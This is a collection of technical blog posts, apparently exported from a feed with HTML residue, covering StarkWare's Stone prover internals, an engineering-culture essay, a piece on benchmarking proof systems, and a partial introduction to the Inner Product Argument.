    self.hash = Hash(new_seed || bytes)</span></span></code></pre>
Here, ||</code> is the concatenation operator.</p>
Sampling from the transcript</h3>
Pseudocode:</p>
def sample_block():</span></span>
    counter_bytes = | 24 bytes of 0x00 | counter as u64 | # This depends on the "block" size, the hash size.</span></span>
    self.counter++</span></span>
    return Hash(self.hash.digest() || counter).digest()</span></span>
</span>
</span>
</span>
def sample(number_bytes):</span></span>
    for chunk32 in split(number_bytes, 32):</span></span>
        result = result + sample_block()</span></span>
    return result</span></span></code></pre>
This is a simplified version of the code. Here, the hash size is assumed to be 32 bytes (256 bits). Also, this pseudocode does not handle the case where a programmer asks for a number of bytes that’s not a multiple of the hash size.</p>
Transcript initialization (Strong Fiat-Shamir)</h3>
The main prover and verifier executables initialize the transcript using a Fiat-Shamir strategy. This means that the hash function is updated using the public parameters.</p>
There are two implementations of this: the Fibonacci AIR and the Cairo AIR (CpuAir</code>).</p>
    * [Fibonacci](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/statement/fibonacci/fibonacci_statement.inl#L40-L52): the transcript is initialized with `claimed_index_in_64_bit_big_endian || claimed_value_in_montgomery_form`</span></span>
    * [Cairo](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/statement/cpu/cpu_air_statement.cc#L99): the transcript is initialized with the `n_steps`, `rc_min`, `rc_max`, and the public memory. The layout is described [here](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/statement/cpu/cpu_air_statement.cc#L127-L135).</span></span></code></pre>Logging interactions</h3>
The flag -generate_annotations</code> can be enabled when the main prover is executed. This logs the interactions between the prover and the verifier and can help debug and address compatibility issues. The annotations are added to the output JSON file of the proof.</p>
</p>
Hash functions</h3>
By default, the keccak256</code> hash function is used.</p>
This is the list of supported options:</p>
using HashTypes = InvokedTypes<</span></span>
    Blake2s256, Keccak256, Pedersen, MaskedHash<Keccak256, 20, true>,</span></span>
    MaskedHash<Blake2s256, 20, true>, MaskedHash<Blake2s256, 20, false>,</span></span>
    MaskedHash<Keccak256, 20, false>>;</span></span></code></pre>Composition polynomial</h2>
Here</a> is an example of how to instantiate a composition polynomial and compute evaluations of it. It can be run like the Fibonacci example.</p>
Relevant classes</h3>
    * [`CompositionPolynomial`](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/composition_polynomial/composition_polynomial.h#L55): Abstract class defining interface. It has only two child classes </span></span>
      * [`CompositionPolynomialImpl`](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/composition_polynomial/composition_polynomial.h#L81): Concrete implementation of the above. It does NOT follow the pimpl pattern. It's just a child class.</span></span>
      * `CompositionPolynomialMock`: Used for testing.</span></span>
    * [`CompositionOracleProver`](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/stark/composition_oracle.h#L44): A wrapper around a `CompositionPolynomial` that also knows the polynomial interpolating the trace (called `traces`), the domains of interpolation, and the transcript.</span></span></code></pre>Notes</h3>
Despite the name, the class CompositionPolynomialImpl</code> is not responsible for the actual computation of the composition polynomial. It does not handle the logic of collecting all individual evaluations of the constraints and gluing them together to form the composition poly. It handles parallelization and formats all inputs to pass them to Air::ConstraintsEval</code>. This is the method where constraints are both evaluated and</strong> aggregated to obtain the evaluation of the composition polynomial. So, every implementation of Air</code> is responsible for the correct aggregation step of all the constraint evaluations.</p>
Two things stand out:</p>
    * There is no degree adjustment. This is seen in the [Fibonacci Air](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/air/fibonacci/fibonacci_air0.inl#L83-L164) and the [Cairo Air](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/air/cpu/board/cpu_air_definition0.inl#L302-L309).</span></span>
    * The coefficients used to aggregate all terms [are all powers of a single challenge](https://github.com/starkware-libs/stone-prover/blob/3d5bb8bd991b7809a6d379c123c902667bac600f/src/starkware/stark/stark.cc#L44-L58).</span></span></code></pre>Evaluation</h3>
For computing the composition polynomial evaluations, the prover calls CompositionOracleProver::EvalComposition(n_tasks)</code></a>. This will return the set of evaluations of the composition polynomial in the $d$ cosets, where $d$ is chosen as the minimum integer such that the degree bound of the composition polynomial is less than $2^n d$ (see the Domains section for details about domains and cosets). The oracle then uses its pointers to the trace polynomials to evaluate them at the LDE domain (or use cached computations from the previous commitment phase). The oracle then passes this to CompositionPolynomial::EvalOnCosetBitReversedOutput()</code> along with coset offsets and other domain relevant data. This method launches multiple tasks that call Air::ConstraintEval</code> to compute a single evaluation at a point of the LDE. This is the method where the computation is ultimately done.</p>
Breaking the composition polynomial</h3>
The composition polynomial $H$ is always broken into $d = \deg(H) / 2^n$ parts, where $2^n$ is the trace length,</p>
$$H = H_0 ( X^d ) + X H_1 ( X^d ) + \cdots + X^{ d - 1 } H_{ d - 1 }( X^d ).$$</p>
To do so, after computing the evaluation of $H$, one way to calculate each $H_i$ would be to interpolate $H$ and then split its coefficients on a monomial basis. The approach</a> in the Stone prover is an optimization of this. Instead of running a full IFFT to interpolate $H$, they do only $\log(d)$ steps of IFFT, resulting in the evaluations of each $H_i$ if $d$ is a power of two.</p>
DEEP composition polynomial</h2>
One strange design choice is reusing the AIR and composition polynomial machinery to build the DEEP</strong> composition polynomial. The deep composition polynomial is seen as a composition polynomial of a particular AIR, called BoundaryAIR</code> (see here</a> and here</a>). It has nothing to do with boundary constraints. It is only used for building the DEEP composition poly. It is the same class, independently of whether the FibonacciAIR, CpuAir or any other AIR is being used to arithmetize the program being proven. The deep composition polynomial is called oods_composition_oracle</code></a> in the main ProveStark</code></a> method.</p>
A side effect of this is cluttering the annotations. It looks like the verifier chooses two times the challenge used for building the composition polynomial:</p>
...</span></span>
V->P: /STARK/Out Of Domain Sampling: Constraint polynomial random element</span></span>
...</span></span>
V->P: /STARK/Out Of Domain Sampling: Constraint polynomial random element</span></span></code></pre>
The first time refers to the challenge of the composition polynomial. The second time refers to the challenge to build the DEEP composition polynomial.</p>
Commitment Scheme</h2>
    * [Here's](https://gist.github.com/ajgara/c9ef34a8b2af614db026dc56c929509b) an example Python code.</span></span></code></pre>
The commitment algorithm is simple at its core, but many classes interact with each other to produce a commitment. Also, there are settings and other factors that can change the way the commitment is made. For example, the trace evaluated at the LDE may not fit into RAM due to its size, changing the commitment strategy. Let’s first analyze the core algorithm, assuming the LDE fits in RAM and no special settings are used.</p>
The strategy here is to build a Merkle tree. To produce this Merkle tree, we need to know how to make the leaves of the tree and how to merge two nodes into a node for the next layer.</p>
Suppose we want to commit the following trace:</p>
Evaluations of column 1 on LDE</th> Evaluations of column 2 on LDE</th></tr></thead>

$t_0 ( wh^0 g^0 )$</td> $t_1 ( wh^0 g^0 )$</td></tr>
$t_0 ( wh^0 g^1 )$</td> $t_1 ( wh^0 g^1 )$</td></tr>
$t_0 ( wh^0 g^2 )$</td> $t_1 ( wh^0 g^2 )$</td></tr>
$t_0 ( wh^0 g^3 )$</td> $t_1 ( wh^0 g^3 )$</td></tr>
$t_0 ( wh^1 g^0 )$</td> $t_1 ( wh^1 g^0 )$</td></tr>
$t_0 ( wh^1 g^1 )$</td> $t_1 ( wh^1 g^1 )$</td></tr>
$t_0 ( wh^1 g^2 )$</td> $t_1 ( wh^1 g^2 )$</td></tr>
$t_0 ( wh^1 g^3 )$</td> $t_1 ( wh^1 g^3 )$</td></tr>
</tbody></table>
We refer to the Domains section for domain details and cosets. The whole LDE domain is shifted by $w$, the powers of $h$ denote in which coset the value sits, and the powers of $g$ denote the index inside that coset. Before committing the trace, the stone prover permutes the order of the rows.</p>
First, the cosets are permutated following bit reverse order</a>. For example, if we had:</p>
| coset 1 | coset 2 | coset 3 | coset 4 |</span></span></code></pre>
Applying the bit reverse permutation:</p>
| coset 1 | coset 3 | coset 2 | coset 4 |</span></span></code></pre>
Then, the bit reverse order is applied again but inside each coset separately. The final permuted trace would look like this:</p>
Evaluations of column 1 on LDE</th> Evaluations of column 2 on LDE</th></tr></thead>

$t_0 (wh^0 g^0 )$</td> $t_1 (wh^0 g^0 )$</td></tr>
$t_0 (wh^0 g^2 )$</td> $t_1 (wh^0 g^2 )$</td></tr>
$t_0 (wh^0 g^1 )$</td> $t_1 (wh^0 g^1 )$</td></tr>
$t_0 (wh^0 g^3 )$</td> $t_1 (wh^0 g^3 )$</td></tr>
$t_0 (wh^1 g^0 )$</td> $t_1 (wh^1 g^0 )$</td></tr>
$t_0 (wh^1 g^2 )$</td> $t_1 (wh^1 g^2 )$</td></tr>
$t_0 (wh^1 g^1 )$</td> $t_1 (wh^1 g^1 )$</td></tr>
$t_0 (wh^1 g^3 )$</td> $t_1 (wh^1 g^3 )$</td></tr>
</tbody></table>
In this case, we only have two cosets, so applying the bit reverse order does nothing, and the two cosets stay in the same place. Then, the elements inside each coset are reordered. Now that we have the correct order, we can start building the leaves of the Merkle tree.</p>
Each leave will correspond to one row. This is because each time the prover opens $t_i(z)$, it will open all of the other columns $t_j(z)$ at the same value $z$, so it makes sense to store them at the same leaf and using the same authentication path for them.</p>
If each column has $|LDE|$ rows, we’ll have $|LDE|$ leaves, each with its hash. The $i$-th leaf is the hash that results from hashing the concatenation of all the columns at the $i$-th row. So, for example, the first leaf in this case is $H( t_0 (w h^0 g^0 ) || t_1 ( w h^0 g^0 ))$.</p>
Note that the stone prover stores its field elements in Montgomery form to enhance the performance of its operations. When using the bytes of a field element to hash them, the field element stays in the Montgomery form (it is not translated to standard format). Also, the limbs representing the field element are stored from least significant at position 0 to most significant at the end.</p>
Now that we have the leaves, our first layer of the tree, we can build the next layer by merging nodes. To do this, the Stone Prover connects two consecutive nodes by concatenating their hashes and obtaining the hash of the new parent. Repeating this operation halves the number of nodes at each step until the Merkle tree is complete.</p>
For a simple example, check out the python code</a>.</p>
Check out the Fibonacci example</a> to see how to instantiate the classes relevant to commitments.</p>
TableProver</h3>
The TableProver</code> abstract class and its implementation TableProverImpl</code> are high-level interfaces for dealing with commitments and decommitments of 2-dimensional arrays of field elements. It consists mainly of a commitment scheme but also has a pointer to a ProverChannel to send and receive elements from the verifier.</p>
There is a TableProverFactory</a> and a utils function</a> to instantiate it. There’s also a helper used in tests</a>.</p>
The TableProverImpl</code> has a Commit</code></a> method that in turn calls the Commit</code> method of its commitment_scheme_</code> member, which is a pointer to a CommitmentSchemeProver</code>.</p>
CommitmentSchemeProver</h3>
This class</a> implements the logic of the commitment scheme.</p>
There is a commitment scheme builder</a> that calls another method here</a> that constructs a CommitmentSchemeProver</code> by alternately calling</a> PackagingCommitmentSchemeProver</code> and CachingCommitmentSchemeProver</code>.</p>
Segments</h4>
There are several details to consider when dealing with traces or LDEs that are so large they do not fit into RAM.</p>
Evaluations of a polynomial over the LDE are split into segments. Each segment contains a continuous subset of the rows. One Merkle tree is built for each part. Then, another Merkle tree is built on top of that, where the leaves are the roots of the Merkle trees of each segment.</p>
Two comments help a bit in understanding here</a> and here</a></p>
CachingCommitmentSchemeProver</h3>
The prover may want to store the entire MerkleTree once it’s committed so that when openings are performed, there’s no need to recalculate them. However, if this is too memory-consuming, the prover might choose not to store it and recalculate it later on. The CachingCommitmentSchemeProver</a> implements this logic.</p>
PackagingCommitmentSchemeProver</h3>
It has an inner commitment scheme, which separates things into packages and passes them to the internal commitment scheme.</p>
FRI</h2>
The FRI part is responsible for generating the FRILayers, generating the query points, and producing the proof. The proof consists of several elements from the Merkle trees from every layer, plus inclusion proofs (authentication paths).</p>
The Frifolder</a> takes two evaluations from the previous layer and computes an evaluation of the current layer using the FriFolderBase</code> class. The FRI protocol allows one to commit to a certain subgroup of layers (for example, every second layer). There is the possibility of varying the number of layers one commits to, but this makes the logic more complicated. The recommendation is to commit every third layer in this issue</a>. However, the FRI step vector makes it harder for a new user to work with the prover and we don’t believe it particulary offers an advantage in performance.</p>
The protocol distinguishes between data and integrity queries; if an evaluation is part of the integrity queries, it is not supplied as part of the proof. This is because the integrity query can be deduced from elements from the previous layers. We don’t need to check the value directly; if we correctly computed the value, the inclusion proof should pass. More concretely, if the prover sends the values corresponding to $p_k ( x_i )$ and $p_k ( - x_i )$, the verifier can compute $p_{ k + 1 }( x_i^2 )$. This value is needed to check the inclusion proof in the Merkle tree; if we use a wrong value, the validation should fail (unless there is a collision for the hash function).</p>
The protocol finishes when the size of a layer is smaller than a threshold value; the prover supplies the polynomial representing those evaluations by performing an interpolation over those values. This optimization reduces the proof length, as we avoid sending several values from many Merkle trees and their authentication paths.</p>
The protocol is optimized for proof size since it avoids sending unnecessary information from the integrity queries, the pairs of values are grouped in the same branch in the Merkle tree, and the protocol finishes before reaching degree zero.</p>
Conclusions</h2>
In this post, we covered different components of the Stone prover, how they work, and some of their consequences in proof size. Starkware has done a great job developing the prover and open-sourcing it. There a few parts that still need an improvement but that is always the case with software.</p>
We are currently working towards achieving compatibility between Stone and STARK Platinum. To reach this goal, we need to adapt different parts so that the challenges we generate are the same and the proof we get (from sampling the queries) and its serialization and deserialization are precisely the same. We will continue explaining how the Stone Prover works and the optimizations we are adding to STARK Platinum to enhance its performance while maintaining compatibility.</p>


Lambda’s engineering philosophy
Unknown — Wed, 27 Sep 2023 00:00:00 +0000
What makes Lambda different</h2>
We often hear that Lambda has a different way of operating compared with other companies. Many people we’ve worked with have praised the speed and quality of our delivery. We attribute that to a set of principles that anyone can apply, and might benefit others. It can be summed up as: observe, iterate, simplify, have a close relationship with your code both in its static and dynamic form, and incorporate process at the correct times to serve the needs of engineering and not management. Let’s break this down:</p>
Be curious, be attached to learning and solving</h2>
We promote a culture where engineers can feel the joy of putting things into production and applying their skills to interesting challenges.</p>
Observe and Measure</h2>
Engineering is applying knowledge to solve problems under a given cost/benefit tradeoff. You cannot solve a problem you cannot see. Seeing is measuring. Use your tools to diagnose the problem, have a metric for success, then measure again after applying your solution.</p>
Build observability into your system. The sooner you see, the sooner you can react, to both changing requirements and changing metrics.</p>
This also applies to performance engineering. Optimization is premature (thus evil) only when it occurs before it is a requirement and before measuring.</p>
Iterate frequently in your perceive-act loop to shorten feedback.</p>
Speak openly about engineering problems</h2>
Once a problem has been identified, speak openly about it. Of course how</em> one communicates is all important when talking to other humans, but if framed correctly a technical discussion should not offend anyone, as the merits or faults of any technical solution only reflect on the thing itself, and not the value of the human or group implementing it.</p>
The earlier a problem (or solution) is communicated and discussed, the better the final solution will be, the lower the risk and cost.</p>
“Pride is not the opposite of shame, but its source. True humility is the only antidote to shame.”</p>
Relationship with complexity (or lack thereof)</h2>
If there is one mantra we repeat and can apply in any context, it is KISS, Keep It Simple, Silly.

Much has been written about this, and there are echoes of it in many other wise reflections, such as Joe Armstrong’s famous quote “Make it work, then make it beautiful, then if you really, really have to, make it fast. 90% of the time, if you make it beautiful, it will already be fast. So really, just make it beautiful!”</em> ; or in some of the tenets of the Zen of Python:</p>
Beautiful is better than ugly.</span></span>
  Explicit is better than implicit.</span></span>
  Simple is better than complex.</span></span>
  Complex is better than complicated.</span></span>
  Flat is better than nested.</span></span>
  Sparse is better than dense.</span></span>
  Readability counts.</span></span></code></pre>
Such general maxims are something that may seem truisms, or tautological sometimes. Their value is in keeping them constantly in mind and asking “how does this apply in this context</em>?”.</p>
Dogfooding</h2>
Repositories should build easily and cleanly on all of the target environments. A newcomer to the project should be able to set it up with no hassle. Take pride in having an up-to-date readme that people can follow and have your code working on their machine in no time. Open-source as much as you can. Put your code out into the world.</p>
Developers should be hands-on about infra, not only familiar with the usual tooling for development but also with the pipelines and code which puts it into production. Your pipelines should be clean and as observable and debuggable as the product code.</p>
Generalization should be end game</h2>
Do not generalize until you absolutely need it. Repeating code two or three times can be fine. Solve the problem you need to solve, don’t get tangled up in how to abstract or generalize the solution, just get it done in the simplest way possible. Generalizations and abstractions arise naturally with time.</p>
Most new challenging projects usually have two different phases:</p>
First few weeks: experiment and prototype</h3>
Things are just starting out. The problem being solved is not yet well understood, there’s a lot of uncertainty; some people know just enough about the problem to recognize it’s a difficult task, but not enough to go ahead and tackle it. This creates a lot of anxiety around how things should be done and what the best way forward is; endless debates that go nowhere ensue. Sometimes some knowledge is worse than knowing nothing at all.</p>
Getting through this requires recognizing that you don’t fully know how to do things and that’s fine; you have to figure it out through trial and error. The mantra here is Go fast, try things out, fail quickly, figure it out</em>.</p>
Introducing a lot of process at this stage is counter-productive, you can’t make a gantt and plan things out with deadlines when you’re not even sure what it is you are building. Doing so just slows you down, or set you on the wrong path.</p>
Morale at this stage is also very important; people are anxious that the project might not pan out, that the problem is not solvable. If there’s too much time without any update or any sort of progress, they get demoralized. The antidote is quickly coding something that performs some basic form of the final desired behavior, and each passing week should expand and improve upon functionality. Don’t let weeks pass by creating lots of code that still doesn’t perform a basic function. Showing regular updates, merging changes quickly and trying them out, deploying regularly and all around having a fast feedback loop is essential to keep people excited and focused.</p>
Settling down</h3>
After a few weeks of work, the project begins to take shape, the problem is better understood and the solution is working out well. People start developing a common vocabulary around the project, they know what problem needs to be solved next and how to do it. Anxiety wears off.</p>
At this point, two things become important:</p>
    * Organizing the work that’s yet to come. The project is no more than a prototype right now, and there is a ton of work to be done to make it production ready.</span></span>
    * Documenting the progress so far. A lot of knowledge was accumulated in the first few weeks/months of work as ideas were tried out and discarded. It’s important for it not to get lost.</span></span></code></pre>
Solving these issues (especially the first one) requires introducing process</em>. Writing down all the tasks left, making a gantt, defining milestones and distributing work accordingly are now necessary to continue. The main obstacle is not so much uncertainty anymore, but rather correct planning and execution.</p>
As the project continues to take shape and grow, merging new changes becomes more and more difficult; its complexity starts making it impossible for you to know every nook and cranny. Also, breaking things has a higher cost both in development time and perhaps money if you’re in production. Thorough testing and code review thus become key.</p>
Process is the sign of a mature</em> project. It is very important, but it should not be introduced before it’s necessary.</p>
Back and forth</h3>
Most projects go through these phases more than once. In general, any time a project gets a new requirement that involves a challenging task, a part of it has to revert to the experimentation phase.</p>
The key here is uncertainty</em>. When you detect that a given task is hard and people are spending way too much time arguing about how to solve it, without ever trying things out (for fear of breaking things or making the wrong move) you need to revert back to the first phase. This doesn’t mean throwing all the process out the window; people who are working on other regular tasks can continue as usual. It’s just the part of the team tackling this new challenge that needs to change its approach.</p>
Incorporating process</h2>
Of all the infinite process management tools and diagrams under the sun, the one we find most useful is the Gantt chart.

Here is an outline of how we go about making one, once the project requires it.</p>
    1. Understand what areas there are in the project in a very broad way. E.g. networking, state transitions, api, db, external services, infra. Architecture diagrams might help at this stage.</span></span>
    2. Divide areas into tasks.</span></span>
    3. Repeat step 2 a couple of times. This refining will help direct research and prevent the “I want to know everything before coding”.</span></span>
    4. Research doesn’t mean just reading, this is a good stage to start with some very small PoCs of things you don’t understand. Some PoCs can even be a good task to delegate to other team members while still figuring out tasks. You’ll need to review those in depth later on though.</span></span>
    5. Track dependencies between tasks. A dependency graph might be a good output here.</span></span>
    6. Use the dependencies to prioritize (order), and group tasks in vertical slices. These are E2E integrations that provide some high-level feature and usually include a bit of all areas.</span></span>
    7. The first vertical slice should be bare bones, maybe providing a dumb useless feature, but should give you “something” working. It should have a db, api, networking, ci, testing and linting (and other tools if necessary). This will force you to forever be in a production mindset from day 1 and avoid giant integrations later on. It also forces you to start doing PoCs of different tools early to reduce uncertainty and unblock as many independent paths as possible for next slices.</span></span>
    8. Make a release plan using these slices. Roughly estimate a number of weeks for each. This is not the time for precise estimations. Also, multiply that number by 1.5 or 2 depending on how optimist you tend to be and how little you still know about the project.</span></span>
    9. Now you can make a Gantt reflecting the release plan and according to the amount of people you have.</span></span></code></pre>


Don't trust, verify or why you should care about benchmarks
Unknown — Sat, 02 Sep 2023 00:00:00 +0000
Recently, there has been quite a lot of debate between researchers and engineers on the best proof system. For example, Justin Thaler</a> and Srinath Setty have been discussing whether FRI or KZG based SNARKs are better in computational terms, following some calculations by Eli Ben-Sasson during SBC</a>. Before jumping into the details and our view on benchmarks, we want to say that we really like all the work developed by the authors, bringing new ideas and debates that can help expand and improve zero-knowledge schemes and their applications. We learned from all of them but think that we should have some clearer criteria on what makes something more performant or useful in engineering terms. Besides, performance and suitability are sometimes application dependent, as Zac Williamson</a> pointed out in an exchange on X, indicating that SNARKs could be more advantageous in client side proving.</p>
Nowadays the performance side of things three big strategies are being publicly discussed:</p>
    * Folding schemes</span></span>
    * Lookup singularity</span></span>
    * STARKs with small fields</span></span></code></pre>
With time some ideas might be combined. In the meantime, we need to have a way of analyzing their practical potential. We can use back of the envelope calculations to analyze these different strategies and proving system. But they are just estimations of the total number of operations, and as such should always be taken with a grain of salt. They may be useful to assess whether some system or algorithm could outperform another, but not as a final measure of performance. Something similar happens with asymptotic complexity; we know of algorithms that may be optimal from their complexity point of view, but have no practical applications (the famous galactic algorithms</a>). Besides, in engineering, problems are multidimensional and there is a lot of interaction between different parts.</p>
There are constraints regarding memory, data communication, having hardware acceleration, code maintainability, economics, etc. For example, memory access patterns can cause a program with less instructions to run slower, if it isn’t suited for cache algorithms, data prefetching and other memory optimizations. Complexity increases if we have to additionally consider the degree of parallelization of the algoritms and GPUs, and even more when we can distribute computation between many machines. An efficient algorithm that can be run only in one machine may be worse in some scenarios than other one that is less efficient and can be distributed in multiple devices. This is, once again, something really similar to what Zac has mentioned. There may be different criteria for selecting algorithms depending on the use case. Most of the times in software, multiple solutions for one problem are used depending on the scenario, and even mixed together when it’s required. To think we already have a grand solution for all the problems, that’s optimal in all scenarios, may be overestimating the complexities of the applied world. There are claims about the number of operations not taking into account the constraints imposed by hardware or use special field families to count the number of operations, which are not applicable to the kind of elliptic curve chosen. For example, commonly used pairing-friendly elliptic curves are defined over primes that don’t have the same type of efficient arithmetic such as Mersenne primes or the “MiniGoldilocks” prime.</p>
Another example of that the complexity of real engineering systems is seen from our point of view in this tweet by Thaler</a>. He asked why Starkware continues to use a rather large finite field despite it not offering any advantages over smaller ones. The reason is quite simple: the SHARP was developed before many improvements and has been in production for many years. Evenmore, for production ready software we need more than a prover. We need languages, compilers, VMs, tools for developers and sequencers for blockchains. There is a lot of work, and rushing to improve the prover with each possible upgrade, on a system that’s in production with a lot of value, may be reckless. From a brilliant idea in paper to a production ready system, there is a lot of engineering work and we always find many more difficulties along the way, that were not originally considered or could have been difficult to foresee.</p>
Critical analysis, with measurements and a good understanding of the possible solutions, is key. We have seen claims such as a STARKs use over 100 GBs of RAM for small programs. It’s not clear what is the criteria of comparison and how many GBs would the alternatives would use. It is important to take advantage of open source software and play with the tools developed by others, to check whether they work as stated and corroborate numbers.</p>
We think that Nova and Lasso bring interesting ideas, which can spark new solutions to other proof systems. We wrote a post on Nova</a> and we plan to have one on Jolt and Lasso. We even had discussions on whether we could adapt some of the ideas behind to a STARKs prover. Folding schemes such as Nova can help solve many problems related to SNARKs based on Plonkish or R1CS arithmetization. In the case of the Cairo prover, there is a strategy that zips the constraints. The Cairo AIR contains the constraints for all the instructions of a Turing-complete virtual machine. The number of constraints does not change with the computation size, as opposed to the execution trace, which grows linearly with the size of the program. The trace is then interpolated and the constraints are enforced via quotients. So, the relevant measure here is the number of steps of the program and not the number of constraints. Fair measurements should be conducted over some commonly used calculations or transactions, for example, an ERC-20 contract. We should also be careful to see speed in a single task as the only thing that matters. Clean codebases, easy to maintain and update, robustness, security, memory use, and auditability are also factors to take into account.</p>
We like the work done in the benchmarks by Celer Network</a> trying to give a fair comparison between different proof systems, using SHA-256 as example circuit. That said we have to always keep in mind that it can become tempting for a project or a particular team to over optimize it’s codebase for a particular benchmark. It’s good to see that the Celer benchmark points out, however, that it is quite difficult to establish a comparison for Nova, as they mention “It’s important to recognize that Nova cannot be directly compared with other frameworks in terms of time and computation. This uniqueness stems from the incremental computing capabilities enabled by Nova. To put it simply, breaking down the entire computation into more detailed steps naturally leads to a decrease in memory consumption, even though it may cause an increase in computation time.” We point out that some of the proof systems are not fully optimized and that could change the trends. The memory vs speed trade-off may be convenient for some use cases, but not in others.</p>
Another point worth noting is that some people tend to add constraints that in practice do not exist, or tend to generalize the strategies that one company uses to all other possible implementations. For example, if A uses Poseidon as hash function, they assume that B, C and D should also use Poseidon, even though that may not fit their particular application. In a recursive environment, we can prove with a SNARK that we verified a STARK proof, which has a lot of usecases. Of course, if we have a tree of recursive proofs of verifications, there is no inconvenient in using a faster hash function for the leaves, such as Blake2, then proving in the second layer that we verified proofs that used Blake2, with Poseidon or other hash.</p>
We think that we should have clear benchmarks, with code used in production. There are, of course, new technologies or ideas that may be promising and we should explore, but we should never be too hasty to jump into the next boat, especially when users assets or privacy are at stake. We will be implementing the different proving systems into the Lambdaworks library, so that anyone can run the benches easily and check which one suits him best. Moreover, if there are optimizations for any of the systems, anyone can submit their PR to improve them. We are not maximalists on any proof system; what we want is this technology to succeed and develop applications on top of it. If a particular system works better, we will learn it and work with it.</p>
We think that debate and having different points of view is important to bring new ideas and improvements to the table, from which we can all benefit. Having open source code, and not only papers, available to tweak, analyze, and play with proving systems is crucial to be able to do comparison. Starkware just open sourced its battle tested Stone prover</a> and this will help a lot to do improvements and comparison between startegies. We also like a lot initiatives such as ZPrize</a>, where teams propose open source optimizations to common problems in zero-knowledge proofs. This can give us the opportunity to explore different strategies and arrive at algorithms that work best in practice.</p>


Inner Product Argument (IPA) and a Polynomial Commitment Scheme
Unknown — Fri, 25 Aug 2023 00:00:00 +0000
In this blogpost, we’ll take a closer look at the Inner Product Argument. We’ll start by understanding the basics of this technique and then shift our focus to its variant within the Halo2 proving system. Specifically, we’ll explore how Halo2 ingeniously employs the Inner Product Argument as a polynomial commitment scheme.</p>
Let’s first fix some notation that will be used throughout the text.</p>
Notation</h2>
The symbol $\mathbb{F}$ always denotes a prime field of order $p$. Given two vectors $A=(a_1,\dots,a_n)$ and $B=(b_1,\dots,b_n)$ of elements of $\mathbb{F}$ of the same length, the inner product between $A$ and $B$ is the element $a_1b_1 + \cdots + a_nb_n \in \mathbb{F}$. It is denoted by $\langle A, B\rangle$.</p>
The symbol $\mathbb{G}$ denotes a commutative group of order $p$. We always use additive notation. If $A=(a_1,\dots,a_n)$ is a vector of elements of $\mathbb{F}$ and $G=(G_1, \dots, G_n)$ is a sequence of elements of $\mathbb{G}$, then $\langle A, G\rangle$ denotes the element $a_1G_1 + \cdots + a_nG_n \in\mathbb{G}$.</p>
The inner product argument</h1>
To understand what this is all about, let’s go straight to its description. This is a sort of commitment scheme and there will be a prover and a verifier. The argument has two parts.</p>
Commit</strong> : The prover can commit to a pair of vectors $(A, B)$, where $A \in \mathbb{F}^n$ and $B \in \mathbb{F}^n$ by producing an object that we denote by $P$. This process does not unveil $A$ or $B$, but it is binding. Meaning that any other vectors would produce another commitment with high probability. Usually, the prover sends $P$ to the verifier.</p>
Open</strong> : Assume the verifier already holds a commitment $P$. The open protocol is an interactive protocol in which the prover sends a value $c\in\mathbb{F}$ and convinces the verifier that</p>
    * $P$ is a valid commitment of two vectors $A$ and $B$, both of length $n$.</span></span>
    * The value $c$ is the inner product of $A$ and $B$.</span></span></code></pre>Ok, but why?</h3>
This scheme itself might not seem particularly valuable, as $A$ and $B$ can be anything. However, its significance lies in its role as a building block for other proving systems. Within these contexts, additional checks are applied to enforce specific structures upon $A$, $B$, and $c$, all dependent on public parameters. Instead of sending $P$, the prover sends other commitments that make possible the structure checks on $A$ and $B$. From those commitments, the verifier can efficiently reconstruct $P$. This approach imbues the vectors with certain contextual meanings regarding the statement being proven. The requirement that their inner product equals a predetermined value functions as evidence of the prover’s knowledge regarding this fact.</p>
The version we’ll describe next was introduced in the Bulletproofs paper</a>. To gain further insight into its application within a zero-knowledge proof of arithmetic circuits, refer to Section 5 of that paper.</p>
Setup</h3>
Both the Commit and Open protocols depend on a few precomputed values. The needed ingredients are:</p>
    * A commutative group $\mathbb{G}$ with $p$ elements. We'll use additive notation.</span></span>
    * Two sequences of elements $G=(G_1,\dots, G_n)$ and $H=(H_1,\dots, H_n)$ of elements of $\mathbb{G}$. We may refer to these as _bases_.</span></span></code></pre>
Here $n$ is the length of the vectors to be committed. We will always assume it is a power of two. If this is not the case, vectors can be padded with zeroes until the next power of two.</p>
Commit</h3>
Given vectors $A = (a_1,\dots, a_n)$ and $B=(b_1,\dots, b_n)$, the commitment of the pair $(A, B)$ is:</p>
$$P := \sum_{i=1}^n a_i G_i + \sum_{i=1}^n b_i H_i.$$</p>
Open</h3>
The Open protocol has $\log_2(n)$ rounds. Let’s start with the easiest example.</p>
Case $n=2$.</h4>
In this case $A = (a_1, a_2)$ and $B = (b_1, b_2)$.</p>
The protocol starts with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.</p>
The prover computes the following elements and sends them to the verifier</p>
    * $L := a_1G_2 + b_2H_1 + a_1b_2U$ and</span></span>
    * $R := a_2G_1 + b_1H_2 + a_2b_1U$.</span></span></code></pre>
The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover, who uses it to compute the following elements:</p>
    * $a' := a_1 x + a_2 x^{-1}$</span></span>
    * $b' := b_1 x^{-1} + b_2 x$</span></span></code></pre>
The prover sends $a’$ and $b’$ to the verifier. Finally, the verifier checks that:</p>
$$

\begin{equation}

x^2 L + P + c U + x^{-2} R = x^{-1} a’ G_1 + xa’ G_2 + x b’ H_1 + x^{-1} b’ H_2 + a’b’U

\end{equation}

$$</p>
The verifier accepts if and only if the above equality holds.</p>
Completeness idea</h4>
To see why this equality holds, one can expand both sides and check that they have the same terms. Let’s examine for example the first term on the right-hand side:</p>
$$

\begin{aligned}

x^{-1} a’ G_1 &= x^{-1} (a_1 x + a_2 x^{-1}) G_1 \\

&= (a_1 + a_2 x^{-2}) G_1 \\

